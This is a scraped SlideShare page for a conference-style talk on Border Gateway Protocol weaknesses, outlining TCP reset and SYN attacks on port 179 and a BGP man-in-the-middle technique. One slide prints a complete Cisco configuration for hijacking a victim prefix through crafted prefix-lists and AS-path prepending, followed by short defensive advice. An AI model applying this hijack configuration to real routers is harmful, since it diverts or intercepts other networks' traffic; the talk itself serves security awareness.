SlideShare una empresa de Scribd logo

BGP Vulnerability

Don Anto
Don Anto

BGP Vulnerability - Shutdown Internet

Tecnología
1 de 17
Descargar para leer sin conexión
HTTP://IPSECS.COM TIME TO SHUTDOWN INTERNET CORE ROUTER
COMMUNICATION  Analog communication  Digital communication  Analog communication to digital communication convergence  Internet Protocol
FUTURE COMMUNICATION  IP based communication will become the core communication?  Scalability and reliability communication infrastructure?  Vulnerability and security threat?
CORE COMMUNICATION  Access Control List?  Default password issue?  Weak password?  Unencrypted remote login?  Routing protocol vulnerability?  We will focus on Border Gateway  Protocol (BGP) now
BGP VULNERABILITY  BGP messages  TCP vulnerability  BGP internet man in the middle  Documented on RFC 4272
BGP MESSAGES  BGP states? idle, connect, active, opensent, openconfirm, established  BGP message? open, update, notification, keep alive  BGP message modification to poison routing table and Denial of Service  Complex and nearly impractical
TCP VULNERABILITY  BGP and TCP port 179  SPOOFED TCP RST/FIN?  TCP port flooding (SYN)  TCP session ends = BGP idle
BGP MAN IN THE MIDDLE  More specific network prefix wins  Use tracroute to identify routing from source to destination  Use route-map and AS-PATH prepending  Static routing to give information about next-hop-router
router bgp 100 network 10.10.220.0 mask 255.255.255.0 neighbor 2.2.4.2 remote­as 40 neighbor 2.2.4.2 prefix­list JACKED out neighbor 2.2.4.2 route­map HIJACK out neighbor 4.3.2.1 remote­as 10 neighbor 4.3.2.1 prefix­list ANN out neighbor 5.4.3.1 remote­as 60 neighbor 5.4.3.1 prefix­list JACKED out neighbor 5.4.3.1 route­map HIJACK out ! ip route 10.10.220.0 255.255.255.0 4.3.2.1 ! ip prefix­list ANN seq 10 permit 2.2.4.0/24 ip prefix­list ANN seq 15 permit 4.3.2.0/24 ip prefix­list ANN seq 20 permit 5.4.3.0/24 ! ip prefix­list JACKED seq 10 permit 2.2.4.0/24 ip prefix­list JACKED seq 15 permit 4.3.2.0/24 ip prefix­list JACKED seq 20 permit 5.4.3.0/24 ip prefix­list JACKED seq 25 permit 10.10.220.0/24 route­map HIJACK permit 10 set as­path prepend 10 20 200
SOME POLICIES  Design and topology?  Access Control List implementation?  Complex password  Encrypted connection (SSH & HTTPS)
DEMO BGP ATTACK
QUESTION? ANSWER
THANK YOU 

Recomendados

Matrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Telecom Solutions: ETERNITY PE - IP-PBXMatrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Comsec
 
31, Get more from your IPv4 resources
31, Get more from your IPv4 resources31, Get more from your IPv4 resources
31, Get more from your IPv4 resources
Bangladesh Network Operators Group
 
Softswitch
SoftswitchSoftswitch
Softswitch
VoIP Infotech
 
Voip softswitch providers
Voip softswitch providersVoip softswitch providers
Voip softswitch providers
VoIP Infotech
 
Softswitch
SoftswitchSoftswitch
Softswitch
VoIP Infotech
 
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Đồng Quốc Vương
 
A multi tenant platform for sms integrated services
A multi tenant platform for sms integrated servicesA multi tenant platform for sms integrated services
A multi tenant platform for sms integrated services
IJCNCJournal
 
Telex Radio Dispatch: brochure
Telex Radio Dispatch: brochureTelex Radio Dispatch: brochure
Telex Radio Dispatch: brochure
Advantec Distribution
 

Recomendados

Matrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Telecom Solutions: ETERNITY PE - IP-PBXMatrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Comsec
 
31, Get more from your IPv4 resources
31, Get more from your IPv4 resources31, Get more from your IPv4 resources
31, Get more from your IPv4 resources
Bangladesh Network Operators Group
 
Softswitch
SoftswitchSoftswitch
Softswitch
VoIP Infotech
 
Voip softswitch providers
Voip softswitch providersVoip softswitch providers
Voip softswitch providers
VoIP Infotech
 
Softswitch
SoftswitchSoftswitch
Softswitch
VoIP Infotech
 
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Đồng Quốc Vương
 
A multi tenant platform for sms integrated services
A multi tenant platform for sms integrated servicesA multi tenant platform for sms integrated services
A multi tenant platform for sms integrated services
IJCNCJournal
 
Telex Radio Dispatch: brochure
Telex Radio Dispatch: brochureTelex Radio Dispatch: brochure
Telex Radio Dispatch: brochure
Advantec Distribution
 
I pv6 tutorial
I pv6 tutorialI pv6 tutorial
I pv6 tutorial
Fred Bovy
 
BGP Prime
BGP Prime BGP Prime
BGP Prime
KHNOG
 
CCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CCNA 200-301 IPv6 addressing and subnetting MCQs CollectionCCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CAS
 
NAT Ccna
NAT CcnaNAT Ccna
NAT Ccna
singhsukdeep
 
Ccna 2 Final V4 1
Ccna 2 Final V4 1Ccna 2 Final V4 1
Ccna 2 Final V4 1
stigerj
 
Ccna 1 5
Ccna 1 5Ccna 1 5
Ccna 1 5
Vahdet Shehu
 
Networking Fundamentals: Local Networks
Networking Fundamentals: Local NetworksNetworking Fundamentals: Local Networks
Networking Fundamentals: Local Networks
Andriy Berestovskyy
 
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sipTlc 004 - take a sip of sip
Tlc 004 - take a sip of sip
Anna Volynkina
 
Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)
Andriy Berestovskyy
 
Ccna 2 chapter 11 2014 v5
Ccna 2 chapter 11 2014 v5Ccna 2 chapter 11 2014 v5
Ccna 2 chapter 11 2014 v5
Đồng Quốc Vương
 
Ccna 3 Chapter 6 V4.0 Answers
Ccna 3 Chapter 6 V4.0 AnswersCcna 3 Chapter 6 V4.0 Answers
Ccna 3 Chapter 6 V4.0 Answers
ccna4discovery
 
BGP Multihoming Techniques
BGP Multihoming TechniquesBGP Multihoming Techniques
BGP Multihoming Techniques
APNIC
 
Nat 03
Nat 03Nat 03
Nat 03
Davinder Chauhan
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
robertoxe
 
How to configure static nat on cisco routers
How to configure static nat on cisco routersHow to configure static nat on cisco routers
How to configure static nat on cisco routers
IT Tech
 
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching HubsLANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
Ronald Bartels
 
Dynamische Routingprotokolle Aufzucht und Pflege - BGP
Dynamische Routingprotokolle Aufzucht und Pflege - BGPDynamische Routingprotokolle Aufzucht und Pflege - BGP
Dynamische Routingprotokolle Aufzucht und Pflege - BGP
Maximilan Wilhelm
 
Routing Implementation - Cisco vs. Mikrotik
Routing Implementation - Cisco vs. MikrotikRouting Implementation - Cisco vs. Mikrotik
Routing Implementation - Cisco vs. Mikrotik
KHNOG
 
IPv6 Static Routes
IPv6 Static RoutesIPv6 Static Routes
IPv6 Static Routes
Irsandi Hasan
 
Sip crash course
Sip crash courseSip crash course
Sip crash course
Jonas Borjesson
 
225735365 ccna-study-guide-a
225735365 ccna-study-guide-a225735365 ccna-study-guide-a
225735365 ccna-study-guide-a
homeworkping10
 
VYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edgeVYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edge
Faelix Ltd
 

Más contenido relacionado

La actualidad más candente

I pv6 tutorial
I pv6 tutorialI pv6 tutorial
I pv6 tutorial
Fred Bovy
 
Ccna 2 Final V4 1
Ccna 2 Final V4 1Ccna 2 Final V4 1
Ccna 2 Final V4 1
stigerj
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
robertoxe
 

La actualidad más candente (20)

I pv6 tutorial
I pv6 tutorialI pv6 tutorial
I pv6 tutorial
 
BGP Prime
BGP Prime BGP Prime
BGP Prime
 
CCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CCNA 200-301 IPv6 addressing and subnetting MCQs CollectionCCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CCNA 200-301 IPv6 addressing and subnetting MCQs Collection
 
NAT Ccna
NAT CcnaNAT Ccna
NAT Ccna
 
Ccna 2 Final V4 1
Ccna 2 Final V4 1Ccna 2 Final V4 1
Ccna 2 Final V4 1
 
Ccna 1 5
Ccna 1 5Ccna 1 5
Ccna 1 5
 
Networking Fundamentals: Local Networks
Networking Fundamentals: Local NetworksNetworking Fundamentals: Local Networks
Networking Fundamentals: Local Networks
 
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sipTlc 004 - take a sip of sip
Tlc 004 - take a sip of sip
 
Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)
 
Ccna 2 chapter 11 2014 v5
Ccna 2 chapter 11 2014 v5Ccna 2 chapter 11 2014 v5
Ccna 2 chapter 11 2014 v5
 
Ccna 3 Chapter 6 V4.0 Answers
Ccna 3 Chapter 6 V4.0 AnswersCcna 3 Chapter 6 V4.0 Answers
Ccna 3 Chapter 6 V4.0 Answers
 
BGP Multihoming Techniques
BGP Multihoming TechniquesBGP Multihoming Techniques
BGP Multihoming Techniques
 
Nat 03
Nat 03Nat 03
Nat 03
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
 
How to configure static nat on cisco routers
How to configure static nat on cisco routersHow to configure static nat on cisco routers
How to configure static nat on cisco routers
 
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching HubsLANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
 
Dynamische Routingprotokolle Aufzucht und Pflege - BGP
Dynamische Routingprotokolle Aufzucht und Pflege - BGPDynamische Routingprotokolle Aufzucht und Pflege - BGP
Dynamische Routingprotokolle Aufzucht und Pflege - BGP
 
Routing Implementation - Cisco vs. Mikrotik
Routing Implementation - Cisco vs. MikrotikRouting Implementation - Cisco vs. Mikrotik
Routing Implementation - Cisco vs. Mikrotik
 
IPv6 Static Routes
IPv6 Static RoutesIPv6 Static Routes
IPv6 Static Routes
 
Sip crash course
Sip crash courseSip crash course
Sip crash course
 

Similar a BGP Vulnerability

WIRELESS NETWORKS
WIRELESS NETWORKSWIRELESS NETWORKS
WIRELESS NETWORKS
dsit1234
 
WIRELESS NETWORK
WIRELESS NETWORKWIRELESS NETWORK
WIRELESS NETWORK
prakash m
 
Lan Network with Redundancy
Lan Network with RedundancyLan Network with Redundancy
Lan Network with Redundancy
Santanu Mukherjee
 

Similar a BGP Vulnerability (20)

225735365 ccna-study-guide-a
225735365 ccna-study-guide-a225735365 ccna-study-guide-a
225735365 ccna-study-guide-a
 
VYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edgeVYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edge
 
Surviving The Stump The Chump Interview Questions
Surviving The Stump The Chump Interview QuestionsSurviving The Stump The Chump Interview Questions
Surviving The Stump The Chump Interview Questions
 
Normas y Estándares
Normas y EstándaresNormas y Estándares
Normas y Estándares
 
I pv4 and ipv6
I pv4 and ipv6I pv4 and ipv6
I pv4 and ipv6
 
5G Transport Network Technology.pptx
5G Transport Network Technology.pptx5G Transport Network Technology.pptx
5G Transport Network Technology.pptx
 
Introduction to TCP/IP
Introduction to TCP/IPIntroduction to TCP/IP
Introduction to TCP/IP
 
6.Routing
6.Routing6.Routing
6.Routing
 
Network
NetworkNetwork
Network
 
CCNA ppt Day 9
CCNA ppt Day 9CCNA ppt Day 9
CCNA ppt Day 9
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
 
BGP Traffic Engineering with SDN Controller
BGP Traffic Engineering with SDN ControllerBGP Traffic Engineering with SDN Controller
BGP Traffic Engineering with SDN Controller
 
WIRELESS NETWORKS
WIRELESS NETWORKSWIRELESS NETWORKS
WIRELESS NETWORKS
 
WIRELESS NETWORK
WIRELESS NETWORKWIRELESS NETWORK
WIRELESS NETWORK
 
06 tk 1073 network layer
06 tk 1073 network layer06 tk 1073 network layer
06 tk 1073 network layer
 
Mpls Services
Mpls ServicesMpls Services
Mpls Services
 
Lan Network with Redundancy.ppt
Lan Network with Redundancy.pptLan Network with Redundancy.ppt
Lan Network with Redundancy.ppt
 
Lan Network with Redundancy
Lan Network with RedundancyLan Network with Redundancy
Lan Network with Redundancy
 
BGP Overview
BGP OverviewBGP Overview
BGP Overview
 
Protocols
ProtocolsProtocols
Protocols
 

Más de Don Anto

IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & Securities
Don Anto
 

Más de Don Anto (7)

Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in Cyberspace
 
IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & Securities
 
Network & Computer Forensic
Network & Computer Forensic Network & Computer Forensic
Network & Computer Forensic
 
Web & Wireless Hacking
Web & Wireless HackingWeb & Wireless Hacking
Web & Wireless Hacking
 
Spying The Wire
Spying The WireSpying The Wire
Spying The Wire
 
Distributed Cracking
Distributed CrackingDistributed Cracking
Distributed Cracking
 
Deep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking PhilosopyDeep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking Philosopy
 

Último

DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Último (20)

Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 

BGP Vulnerability